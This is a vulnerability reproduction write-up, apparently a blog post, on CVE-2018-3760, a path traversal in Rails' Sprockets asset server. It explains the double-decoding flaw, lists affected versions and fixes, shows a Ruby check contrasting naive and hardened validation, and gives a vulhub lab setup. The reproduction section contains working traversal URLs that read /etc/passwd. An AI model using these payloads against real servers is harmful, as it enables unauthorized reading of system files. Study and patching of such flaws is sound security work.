CVE-2018-3760 vulnerability reproduce (read arbitrary files)

0x00 Vulnerability introduction

Ruby on Rails is a well-known Ruby web development framework that uses Sprockets as the static file server in the development environment. Sprockets is a Ruby library for compiling and serving static asset files.
In Sprockets 3.7.1 and earlier, a path traversal vulnerability exists because the path is decoded a second time. An attacker can use %252e%252e/ to reach the root directory and read or execute arbitrary files on the target server.

0x01 Vulnerability principle

The problem lies in Sprockets, which resolves the dependencies between JavaScript files and optimizes the JavaScript a page loads so that unnecessary js files are not fetched.
When a URL such as http://127.0.0.1:3000/assets/foo.js is requested, the request enters server.rb.
There, forbidden_request? checks whether the path contains .. (to prevent directory traversal) and whether it is an absolute path.
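As an added illustration (not code from the original post or from Sprockets itself), the following simplified model shows why a check that looks for .. after a single URL decode misses %252e%252e, and what a stricter check looks like. The function names and the sample request paths are constructed for this example.

```ruby
# Added illustration (not sprockets' own code) of the check described above.

# Minimal percent-decoder: one decoding round, as the server performs it.
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Naive check modelled on the one described above: decode once, then
# reject ".." and absolute paths. "%252e%252e" decodes to "%2e%2e", which
# contains no literal "..", so this check lets it through.
def naive_forbidden?(raw_path)
  path = percent_decode(raw_path)
  path.include?('..') || path.start_with?('/')
end

# Decode until the string stops changing (bounded), so that every layer of
# encoding is removed before the path is inspected.
def fully_decode(raw_path, max_rounds = 5)
  path = raw_path
  max_rounds.times do
    decoded = percent_decode(path)
    return decoded if decoded == path
    path = decoded
  end
  path
end

# Hardened check: reject scheme-prefixed paths (file://), absolute paths,
# and a ".." segment at any decoding depth.
def hardened_forbidden?(raw_path)
  path = fully_decode(raw_path)
  return true if path.include?('://') || path.start_with?('/')
  path.split(%r{[\\/]}).include?('..')
end

# Constructed sample requests, in the form they arrive in PATH_INFO.
SAMPLE_PATHS = [
  'application.js',
  '..%2f..%2fconfig.ru',
  '%252e%252e/%252e%252e/etc/passwd',
  'file:%2f%2f/etc/passwd'
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_PATHS.each do |p|
    puts format('%-36s naive=%-5s hardened=%s', p, naive_forbidden?(p), hardened_forbidden?(p))
  end
end
```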

0x02 Affected versions

  • 4.0.0.beta7 and earlier
  • 3.7.1 and earlier
  • 2.12.4 and earlier

0x03 Vulnerability fix

In a Rails application, this issue can be resolved by setting config.assets.compile = false, then
enabling config.public_file_server.enabled = true and precompiling the assets during initialization.

This does not resolve the problem in every hosting environment, so upgrading is recommended.

Patches

To help users who cannot upgrade immediately, patches are provided
in git-am format, each consisting of a single changeset.

  • 4-0-fix-path-traversal.patch: patch for the 4.0.x release series
  • 3-7-fix-path-traversal.patch: patch for the 3.7.x release series
  • 2-12-fix-path-traversal.patch: patch for the 2.12.x release series

0x04 Vulnerability environment

cd vulhub-master/
cd rails/
cd CVE-2018-3760/
docker-compose up -d

Then open http://192.168.168.137:3000 in a browser.

0x05 Vulnerability reproduction

http://192.168.139.137:3000/assets/file:%2f%2f/etc/passwd
http://192.168.139.137:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

The error page discloses a directory listing. Pick one of the listed directories, such as /usr/src/blog/app/assets/images, then step up one level per %252e%252e/ segment, and finally read /etc/passwd.

Origin: blog.csdn.net/qq_41901122/article/details/103879565